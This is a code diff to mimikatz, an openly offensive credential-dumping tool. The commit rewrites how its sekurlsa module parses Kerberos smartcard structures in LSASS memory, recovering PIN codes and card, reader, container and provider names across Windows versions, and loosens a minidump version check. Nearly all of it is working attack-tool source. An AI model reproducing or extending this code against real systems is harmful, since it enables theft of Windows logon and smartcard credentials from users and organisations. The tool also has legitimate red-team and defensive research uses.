mimikatz + mimilib sekurlsa fix for SmartCard informations

mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c

@@ -181,7 +181,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
 							cLsass.osContext.MinorVersion = pInfos->MinorVersion;
 							cLsass.osContext.BuildNumber  = pInfos->BuildNumber;
 
-							if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10))
+							if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion >= 6))
 								PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
 						#ifdef _M_X64
 							else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64))
@@ -1022,14 +1022,14 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 			if(mesCreds->Domaine.Buffer)
 			{
 				kprintf(
-					L"\n\t     Model    : %s"
+					L"\n\t     Card     : %s"
 					L"\n\t     Reader   : %s"
-					L"\n\t     Key name : %s"
+					L"\n\t     Container: %s"
 					L"\n\t     Provider : %s",
-					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToCard,
-					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToReader,
-					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToSerial,
-					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToProvider
+					(PBYTE) mesCreds->Domaine.Buffer + 4 * sizeof(DWORD) + sizeof(wchar_t) * ((PDWORD) mesCreds->Domaine.Buffer)[0],
+					(PBYTE) mesCreds->Domaine.Buffer + 4 * sizeof(DWORD) + sizeof(wchar_t) * ((PDWORD) mesCreds->Domaine.Buffer)[1],
+					(PBYTE) mesCreds->Domaine.Buffer + 4 * sizeof(DWORD) + sizeof(wchar_t) * ((PDWORD) mesCreds->Domaine.Buffer)[2],
+					(PBYTE) mesCreds->Domaine.Buffer + 4 * sizeof(DWORD) + sizeof(wchar_t) * ((PDWORD) mesCreds->Domaine.Buffer)[3]
 					);
 			}
 		}

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c

@@ -66,9 +66,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
 		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
 		sizeof(KERB_HASHPASSWORD_5),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, sizeOfCurrentStruct),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_51),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
 	},
 	{
 		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -101,9 +101,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
 		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
 		sizeof(KERB_HASHPASSWORD_5),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, sizeOfCurrentStruct),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_51),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData)
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -136,9 +136,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, sizeOfCurrentStruct),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_60),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -171,9 +171,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_61, sizeOfCurrentStruct),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_61, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_61),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -206,9 +206,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, sizeOfCurrentStruct),
-		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_62),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
@@ -241,9 +241,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
-		0,//FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, sizeOfCurrentStruct),
-		0,//FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, names),
-		sizeof(KIWI_KERBEROS_CSP_INFOS_10),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
 	},
 };
 
@@ -285,6 +285,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECU
 void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
 {
 	KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
+	DWORD szCsp;
 	PBYTE infosCsp;
 	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
 	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
@@ -298,9 +299,9 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SE
 			if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structCspInfosSize))
 			{
 				creds.UserName = *(PUNICODE_STRING) infosCsp;
-				if(kerbHelper[KerbOffsetIndex].offsetNames && kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct)
+				if(szCsp = *(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCsp))
 				{
-					creds.Domaine.Length = (USHORT)	(*(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct) - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct));
+					creds.Domaine.Length = (USHORT)	(szCsp - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].structCspInfosSize));
 					if(creds.Domaine.Buffer = (PWSTR) LocalAlloc(LPTR, creds.Domaine.Length))
 					{
 						aLsassMemory.address = (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetNames;

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h

@@ -71,122 +71,91 @@ typedef struct _KERB_INFOS {
 	LONG	offsetHashGeneric;
 	SIZE_T	structKeyPasswordHashSize;
 
-	LONG	offsetSizeOfCurrentStruct;
+	LONG	offsetSizeOfCsp;
 	LONG	offsetNames;
 	SIZE_T	structCspInfosSize;
 } KERB_INFOS, *PKERB_INFOS;
 
-typedef struct _KIWI_KERBEROS_CSP_NAMES {
-	DWORD offsetToCard;
-	DWORD offsetToReader;
-	DWORD offsetToSerial;
-	DWORD offsetToProvider;
-	//...
-} KIWI_KERBEROS_CSP_NAMES, *PKIWI_KERBEROS_CSP_NAMES;
+typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
+	DWORD dwCspInfoLen;
+	PVOID ContextInformation;
+	ULONG nCardNameOffset;
+	ULONG nReaderNameOffset;
+	ULONG nContainerNameOffset;
+	ULONG nCSPNameOffset;
+	WCHAR bBuffer[ANYSIZE_ARRAY];
+} KERB_SMARTCARD_CSP_INFO_5, *PKERB_SMARTCARD_CSP_INFO_5;
 
-typedef struct _KIWI_KERBEROS_CSP_INFOS_51 {
+typedef struct _KERB_SMARTCARD_CSP_INFO {
+	DWORD dwCspInfoLen;
+	DWORD MessageType;
+	union {
+		PVOID   ContextInformation;
+		ULONG64 SpaceHolderForWow64;
+	};
+	DWORD flags;
+	DWORD KeySpec;
+	ULONG nCardNameOffset;
+	ULONG nReaderNameOffset;
+	ULONG nContainerNameOffset;
+	ULONG nCSPNameOffset;
+	WCHAR bBuffer[ANYSIZE_ARRAY];
+} KERB_SMARTCARD_CSP_INFO, *PKERB_SMARTCARD_CSP_INFO;
+
+typedef struct _KIWI_KERBEROS_CSP_INFOS_5 {
 	LSA_UNICODE_STRING PinCode;
 	PVOID unk0;
 	PVOID unk1;
 	PVOID CertificateInfos;
-	PVOID unk2;
-	PVOID unk3;
-	DWORD sizeOfNextStruct;
-	DWORD sizeOfCurrentStruct;
-	PVOID unkCSP; // ?,
-	KIWI_KERBEROS_CSP_NAMES names;
-} KIWI_KERBEROS_CSP_INFOS_51, *PKIWI_KERBEROS_CSP_INFOS_51;
+
+	PVOID unkData;	// 0 = CspData
+	DWORD Flags;	// 1 = CspData (not 0x21)
+
+
+	DWORD CspDataLength;
+	KERB_SMARTCARD_CSP_INFO_5 CspData;
+} KIWI_KERBEROS_CSP_INFOS_5, *PKIWI_KERBEROS_CSP_INFOS_5;
 
 typedef struct _KIWI_KERBEROS_CSP_INFOS_60 {
 	LSA_UNICODE_STRING PinCode;
 	PVOID unk0;
 	PVOID unk1;
 	PVOID CertificateInfos;
-	PVOID unk2;
-#ifdef _M_IX86
-	DWORD		unkAlign0;
-#endif
-	DWORD unk3_size;
-	DWORD sizeOfNextStruct;
-	DWORD unk4;
-	DWORD sizeOfCurrentStruct;
-	DWORD unk5;
-	PVOID unkCSP; // ?,
-#ifdef _M_IX86
-	DWORD		unkAlign1;
-#endif
-	DWORD unk6;
-	DWORD unk7;
-	KIWI_KERBEROS_CSP_NAMES names;
-} KIWI_KERBEROS_CSP_INFOS_60, *PKIWI_KERBEROS_CSP_INFOS_60;
 
-typedef struct _KIWI_KERBEROS_CSP_INFOS_61 {
-	LSA_UNICODE_STRING PinCode;
-	PVOID unk0;
-	PVOID unk1;
-	PVOID CertificateInfos;
-	PVOID unk2;
-	DWORD unk3;
-	DWORD unk4_size;
-	DWORD sizeOfNextStruct;
-	DWORD unk5;
-	DWORD sizeOfCurrentStruct;
-	DWORD unk6;
-	PVOID unkCSP;
-#ifdef _M_IX86
-	DWORD		unkAlign0;
-#endif
-	DWORD unk7;
-	DWORD unk8;
-	KIWI_KERBEROS_CSP_NAMES names;
-} KIWI_KERBEROS_CSP_INFOS_61, *PKIWI_KERBEROS_CSP_INFOS_61;
+	PVOID unkData;	// 0 = CspData
+	DWORD Flags;	// 0 = CspData
+	DWORD unkFlags;	// 0x141
+
+	DWORD CspDataLength;
+	KERB_SMARTCARD_CSP_INFO CspData;
+} KIWI_KERBEROS_CSP_INFOS_60, *PKIWI_KERBEROS_CSP_INFOS_60;
 
 typedef struct _KIWI_KERBEROS_CSP_INFOS_62 {
 	LSA_UNICODE_STRING PinCode;
 	PVOID unk0;
 	PVOID unk1;
 	PVOID CertificateInfos;
 	PVOID unk2;
-	PVOID unk3;
-	DWORD unk4;
-	DWORD unk5_size;
-	DWORD sizeOfNextStruct;
-#ifdef _M_X64
-	DWORD		unkAlign0;
-#endif
-	DWORD sizeOfCurrentStruct;
-	DWORD unk7;
-	PVOID unkCSP;
-#ifdef _M_IX86
-	DWORD		unkAlign1;
-#endif
-	DWORD unk8;
-	DWORD unk9;
-	KIWI_KERBEROS_CSP_NAMES names;
+	PVOID unkData;	// 0 = CspData
+	DWORD Flags;	// 0 = CspData
+	DWORD unkFlags;	// 0x141 (not 0x61)
+
+	DWORD CspDataLength;
+	KERB_SMARTCARD_CSP_INFO CspData;
 } KIWI_KERBEROS_CSP_INFOS_62, *PKIWI_KERBEROS_CSP_INFOS_62;
 
 typedef struct _KIWI_KERBEROS_CSP_INFOS_10 {
 	LSA_UNICODE_STRING PinCode;
 	PVOID unk0;
 	PVOID unk1;
 	PVOID CertificateInfos;
-//	PVOID unk2;
-//	PVOID unk3;
-//	DWORD unk4;
-//#ifdef _M_X64
-//	DWORD		unkAlign0;
-//#endif
-//	DWORD unk5_size;
-//	DWORD sizeOfNextStruct;
-//	DWORD sizeOfCurrentStruct;
-//	DWORD unk6;
-//	PVOID unkCSP; // ?,
-//#ifdef _M_IX86
-//	DWORD		unkAlign1;
-//#endif
-//	DWORD unk7;
-//	DWORD unk8;
-//	KIWI_KERBEROS_CSP_NAMES names;
+	PVOID unk2;
+	PVOID unkData;	// 0 = CspData
+	DWORD Flags;	// 0 = CspData
+	DWORD unkFlags;	// 0x141 (not 0x61)
+	PVOID unk3;
+	DWORD CspDataLength;
+	KERB_SMARTCARD_CSP_INFO CspData;
 } KIWI_KERBEROS_CSP_INFOS_10, *PKIWI_KERBEROS_CSP_INFOS_10;
 
 typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {